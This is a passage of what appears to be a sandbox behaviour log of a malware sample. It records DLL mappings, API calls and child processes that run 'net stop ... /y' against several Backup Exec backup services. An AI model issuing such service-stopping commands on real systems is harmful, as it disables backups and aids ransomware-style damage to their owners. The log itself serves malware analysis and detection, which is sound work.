0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 5011 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5012 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5013 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5014 start_va = 0x7fef8260000 end_va = 0x7fef8271fff entry_point = 0x7fef8260000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5015 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5016 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5017 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5018 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5019 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5020 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5021 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5022 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5023 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5024 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5025 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5026 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5027 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5028 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5069 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 492 os_tid = 0x1164 [0089.636] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fb90 | out: lpSystemTimeAsFileTime=0x28fb90*(dwLowDateTime=0xea97bf50, dwHighDateTime=0x1d48689)) [0089.636] GetCurrentProcessId () returned 0x1160 [0089.636] GetCurrentThreadId () returned 0x1164 [0089.636] GetTickCount () returned 0x20405 [0089.636] QueryPerformanceCounter (in: lpPerformanceCount=0x28fb98 | out: lpPerformanceCount=0x28fb98*=1813655400000) returned 1 [0089.638] GetModuleHandleW (lpModuleName=0x0) returned 0xffe70000 [0089.720] __set_app_type (_Type=0x1) [0089.720] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe89c9c) returned 0x0 [0089.720] __getmainargs (in: _Argc=0xffe94780, _Argv=0xffe94790, _Env=0xffe94788, _DoWildCard=0, _StartInfo=0xffe9479c | out: _Argc=0xffe94780, _Argv=0xffe94790, _Env=0xffe94788) returned 0 [0089.720] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0089.720] GetConsoleOutputCP () returned 0x1b5 [0089.720] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffe9cec0 | out: lpCPInfo=0xffe9cec0) returned 1 [0089.720] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0089.723] sprintf_s (in: _DstBuf=0x28fb38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0089.723] setlocale (category=0, locale=".437") returned="English_United States.437" [0089.724] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0089.725] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0089.725] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentAccelerator /y" [0089.725] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f8d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0089.725] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0089.725] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fb28 | out: Buffer=0x28fb28*=0x3bc0f0) returned 0x0 [0089.725] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fb28 | out: Buffer=0x28fb28*=0x3bc110) returned 0x0 [0089.725] _fileno (_File=0x7fefdba2a80) returned 0 [0089.725] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0089.725] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0089.725] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0089.725] _wcsicmp (_String1="config", _String2="stop") returned -16 [0089.725] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0089.725] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0089.725] _wcsicmp (_String1="file", _String2="stop") returned -13 [0089.725] _wcsicmp (_String1="files", _String2="stop") returned -13 [0089.725] _wcsicmp (_String1="group", _String2="stop") returned -12 [0089.725] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0089.726] _wcsicmp (_String1="help", _String2="stop") returned -11 [0089.726] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0089.726] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0089.726] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0089.726] _wcsicmp (_String1="session", _String2="stop") returned -15 [0089.726] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0089.726] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0089.726] _wcsicmp (_String1="share", _String2="stop") returned -12 [0089.726] _wcsicmp (_String1="start", _String2="stop") returned -14 [0089.726] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0089.726] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0089.726] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0089.726] _wcsicmp (_String1="accounts", _String2="BackupExecAgentAccelerator") returned -1 [0089.726] _wcsicmp (_String1="computer", _String2="BackupExecAgentAccelerator") returned 1 [0089.726] _wcsicmp (_String1="config", _String2="BackupExecAgentAccelerator") returned 1 [0089.726] _wcsicmp (_String1="continue", _String2="BackupExecAgentAccelerator") returned 1 [0089.726] _wcsicmp (_String1="cont", _String2="BackupExecAgentAccelerator") returned 1 [0089.726] _wcsicmp (_String1="file", _String2="BackupExecAgentAccelerator") returned 4 [0089.726] _wcsicmp (_String1="files", _String2="BackupExecAgentAccelerator") returned 4 [0089.726] _wcsicmp (_String1="group", _String2="BackupExecAgentAccelerator") returned 5 [0089.726] _wcsicmp (_String1="groups", _String2="BackupExecAgentAccelerator") returned 5 [0089.726] _wcsicmp (_String1="help", _String2="BackupExecAgentAccelerator") returned 6 [0089.726] _wcsicmp (_String1="helpmsg", _String2="BackupExecAgentAccelerator") returned 6 [0089.726] _wcsicmp (_String1="localgroup", _String2="BackupExecAgentAccelerator") returned 10 [0089.726] _wcsicmp (_String1="pause", _String2="BackupExecAgentAccelerator") returned 14 [0089.726] _wcsicmp (_String1="session", _String2="BackupExecAgentAccelerator") returned 17 [0089.726] _wcsicmp (_String1="sessions", _String2="BackupExecAgentAccelerator") returned 17 [0089.726] _wcsicmp (_String1="sess", _String2="BackupExecAgentAccelerator") returned 17 [0089.726] _wcsicmp (_String1="share", _String2="BackupExecAgentAccelerator") returned 17 [0089.727] _wcsicmp (_String1="start", _String2="BackupExecAgentAccelerator") returned 17 [0089.727] _wcsicmp (_String1="stats", _String2="BackupExecAgentAccelerator") returned 17 [0089.727] _wcsicmp (_String1="statistics", _String2="BackupExecAgentAccelerator") returned 17 [0089.727] _wcsicmp (_String1="stop", _String2="BackupExecAgentAccelerator") returned 17 [0089.727] _wcsicmp (_String1="time", _String2="BackupExecAgentAccelerator") returned 18 [0089.727] _wcsicmp (_String1="user", _String2="BackupExecAgentAccelerator") returned 19 [0089.727] _wcsicmp (_String1="users", _String2="BackupExecAgentAccelerator") returned 19 [0089.727] _wcsicmp (_String1="msg", _String2="BackupExecAgentAccelerator") returned 11 [0089.727] _wcsicmp (_String1="messenger", _String2="BackupExecAgentAccelerator") returned 11 [0089.727] _wcsicmp (_String1="receiver", _String2="BackupExecAgentAccelerator") returned 16 [0089.727] _wcsicmp (_String1="rcv", _String2="BackupExecAgentAccelerator") returned 16 [0089.727] _wcsicmp (_String1="netpopup", _String2="BackupExecAgentAccelerator") returned 12 [0089.727] _wcsicmp (_String1="redirector", _String2="BackupExecAgentAccelerator") returned 16 [0089.727] _wcsicmp (_String1="redir", _String2="BackupExecAgentAccelerator") returned 16 [0089.727] _wcsicmp (_String1="rdr", _String2="BackupExecAgentAccelerator") returned 16 [0089.727] _wcsicmp (_String1="workstation", _String2="BackupExecAgentAccelerator") returned 21 [0089.727] _wcsicmp (_String1="work", _String2="BackupExecAgentAccelerator") returned 21 [0089.727] _wcsicmp (_String1="wksta", _String2="BackupExecAgentAccelerator") returned 21 [0089.727] _wcsicmp (_String1="prdr", _String2="BackupExecAgentAccelerator") returned 14 [0089.727] _wcsicmp (_String1="devrdr", _String2="BackupExecAgentAccelerator") returned 2 [0089.727] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecAgentAccelerator") returned 10 [0089.727] _wcsicmp (_String1="server", _String2="BackupExecAgentAccelerator") returned 17 [0089.727] _wcsicmp (_String1="svr", _String2="BackupExecAgentAccelerator") returned 17 [0089.727] _wcsicmp (_String1="srv", _String2="BackupExecAgentAccelerator") returned 17 [0089.727] _wcsicmp (_String1="lanmanserver", _String2="BackupExecAgentAccelerator") returned 10 [0089.727] _wcsicmp (_String1="alerter", _String2="BackupExecAgentAccelerator") returned -1 [0089.727] _wcsicmp (_String1="netlogon", _String2="BackupExecAgentAccelerator") returned 12 [0089.727] _wcsupr (in: _String="BackupExecAgentAccelerator" | out: _String="BACKUPEXECAGENTACCELERATOR") returned="BACKUPEXECAGENTACCELERATOR" [0089.728] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3bce20 [0089.731] GetServiceKeyNameW (in: hSCManager=0x3bce20, lpDisplayName="BACKUPEXECAGENTACCELERATOR", lpServiceName=0xffe95750, lpcchBuffer=0x28fa48 | out: lpServiceName="", lpcchBuffer=0x28fa48) returned 0 [0089.733] _wcsicmp (_String1="msg", _String2="BACKUPEXECAGENTACCELERATOR") returned 11 [0089.733] _wcsicmp (_String1="messenger", _String2="BACKUPEXECAGENTACCELERATOR") returned 11 [0089.733] _wcsicmp (_String1="receiver", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0089.733] _wcsicmp (_String1="rcv", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0089.733] _wcsicmp (_String1="redirector", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0089.733] _wcsicmp (_String1="redir", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0089.733] _wcsicmp (_String1="rdr", _String2="BACKUPEXECAGENTACCELERATOR") returned 16 [0089.733] _wcsicmp (_String1="workstation", _String2="BACKUPEXECAGENTACCELERATOR") returned 21 [0089.733] _wcsicmp (_String1="work", _String2="BACKUPEXECAGENTACCELERATOR") returned 21 [0089.733] _wcsicmp (_String1="wksta", _String2="BACKUPEXECAGENTACCELERATOR") returned 21 [0089.733] _wcsicmp (_String1="prdr", _String2="BACKUPEXECAGENTACCELERATOR") returned 14 [0089.733] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECAGENTACCELERATOR") returned 2 [0089.733] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECAGENTACCELERATOR") returned 10 [0089.733] _wcsicmp (_String1="server", _String2="BACKUPEXECAGENTACCELERATOR") returned 17 [0089.733] _wcsicmp (_String1="svr", _String2="BACKUPEXECAGENTACCELERATOR") returned 17 [0089.733] _wcsicmp (_String1="srv", _String2="BACKUPEXECAGENTACCELERATOR") returned 17 [0089.733] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECAGENTACCELERATOR") returned 10 [0089.734] _wcsicmp (_String1="alerter", _String2="BACKUPEXECAGENTACCELERATOR") returned -1 [0089.734] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECAGENTACCELERATOR") returned 12 [0089.734] NetServiceControl (in: servername=0x0, service="BACKUPEXECAGENTACCELERATOR", opcode=0x0, arg=0x0, bufptr=0x28fa50 | out: bufptr=0x28fa50) returned 0x889 [0089.734] wcscpy_s (in: _Destination=0xffe980d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0089.734] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0089.735] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffe95b50, nSize=0x800, Arguments=0xffe97f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0089.737] GetFileType (hFile=0xb) returned 0x2 [0089.737] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f918 | out: lpMode=0x28f918) returned 1 [0089.737] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe95b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28f910, lpReserved=0x0 | out: lpBuffer=0xffe95b50*, lpNumberOfCharsWritten=0x28f910*=0x1e) returned 1 [0089.738] GetFileType (hFile=0xb) returned 0x2 [0089.738] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f918 | out: lpMode=0x28f918) returned 1 [0089.738] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe71efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f910, lpReserved=0x0 | out: lpBuffer=0xffe71efc*, lpNumberOfCharsWritten=0x28f910*=0x2) returned 1 [0089.738] _ultow (in: _Dest=0x889, _Radix=2685312 | out: _Dest=0x889) returned="2185" [0089.738] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffe95b50, nSize=0x800, Arguments=0xffe97f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0089.738] GetFileType (hFile=0xb) returned 0x2 [0089.739] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f918 | out: lpMode=0x28f918) returned 1 [0089.739] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe95b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28f910, lpReserved=0x0 | out: lpBuffer=0xffe95b50*, lpNumberOfCharsWritten=0x28f910*=0x34) returned 1 [0089.739] GetFileType (hFile=0xb) returned 0x2 [0089.739] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f918 | out: lpMode=0x28f918) returned 1 [0089.740] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffe71efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f910, lpReserved=0x0 | out: lpBuffer=0xffe71efc*, lpNumberOfCharsWritten=0x28f910*=0x2) returned 1 [0089.740] NetApiBufferFree (Buffer=0x3bc0f0) returned 0x0 [0089.740] NetApiBufferFree (Buffer=0x3bc110) returned 0x0 [0089.740] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentAccelerator /y" [0089.740] exit (_Code=2) Process: id = "98" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x19fd8000" os_pid = "0x1170" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop BackupExecManagementService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5053 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5054 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5055 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5056 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 5057 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5058 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5059 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5060 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5061 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5062 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5063 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5064 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 5065 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 5066 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5067 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 493 os_tid = 0x1174 Process: id = "99" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6eef7000" os_pid = "0x119c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop BackupExecRPCService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5070 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5071 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5072 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 5073 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 5074 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5075 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5076 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5077 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5078 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5079 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5080 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 5081 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5082 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 5083 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5084 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5169 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5170 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5171 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5172 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 5173 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 5174 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5175 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5176 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5177 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 5178 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5179 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5180 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5181 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5182 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5183 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5184 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5185 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5186 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5187 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5188 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 495 os_tid = 0x11a0 Process: id = "100" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6ddc2000" os_pid = "0x11a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "93" os_parent_pid = "0x111c" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecDeviceMediaService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups 